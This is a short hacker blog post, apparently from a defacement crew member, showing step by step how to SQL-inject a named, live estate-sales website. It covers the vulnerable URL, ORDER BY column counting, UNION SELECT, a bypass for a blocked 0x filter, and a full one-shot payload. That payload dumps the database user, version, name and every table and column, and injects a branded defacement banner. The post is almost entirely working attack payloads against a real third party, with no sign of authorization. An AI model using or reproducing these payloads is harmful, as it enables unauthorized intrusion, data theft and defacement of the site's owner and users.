Hello to all my friends, again im Mr.GonzX
Today i will make an article about How to Bypass 418 unused
Today i will make an article about How to Bypass 418 unused
Target : https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS
First I check if this website is vulnerable to SQLi, I put ( ' ) in parameter and i got error and my query like this
https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'
Means the website is vulnerable to SQLi : )
Second is fixing the error
https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'--+-
Error fixed, so we will use string based
This time is we will use ORDER BY to see how many columns
So i got 7 columns and my query like this
https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'ORDER+BY+7--+-
Now we use UNION SELECT to see the vulnerable column and my query like this
https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'AND+0+UNION+SELECT+1,2,3,4,5,6,7--+-
So the vulnerable columns is ( 2,1, and 4 )
Lets try to print nick and my query like this
https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'AND+0+UNION+SELECT+1,concat(0x496e6a6563746564206279204d722e476f6e7a58),3,4,5,6,7--+-
The problem is the 0x, the 0x is blocked, to bypass this we can use single quote and my query like this
https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'AND+0+UNION+SELECT+1,concat('Injected by Mr.GonzX'),3,4,5,6,7--+-
And yes I bypassed the ( unused ) error :)
Lets DIOS, make sure no 0x in your DIOS and my query like this
https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'AND+0+UNION+SELECT+1,concat('<img src=%22https://i.ibb.co/3Tp4CzG/mrgonzx.png%22 height=%22150%22 width=%22150%22>','<br>','<font color=%22red%22><b>','Injected by Mr.GonzX','</b>','</font>','<br>','<font color=blue>','<b>','USER','</b>','</font>','::','<font color=green>',user(),'</font>','<br>','<font color=blue>','<b>','VERSION','</b>','</font>','::','<font color=green>',version(),'</font>','<br>','<font color=blue>','<b>','DATABASE','</b>','</font>','::','<font color=green>',database(),'</font>','<br>','<br>',(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=coNcat(@x,'<li>',table_name,' :::: ',column_name))))x)),3,4,5,6,7--+-
As you can see in my DIOS no 0x
And I successfully bypass the ( unused ) error
Thank your for reading our blog
Greetings :
N16H7 CR4WL3R
TROY
Cyb3rFr0st
Illumni
Mr.Krungx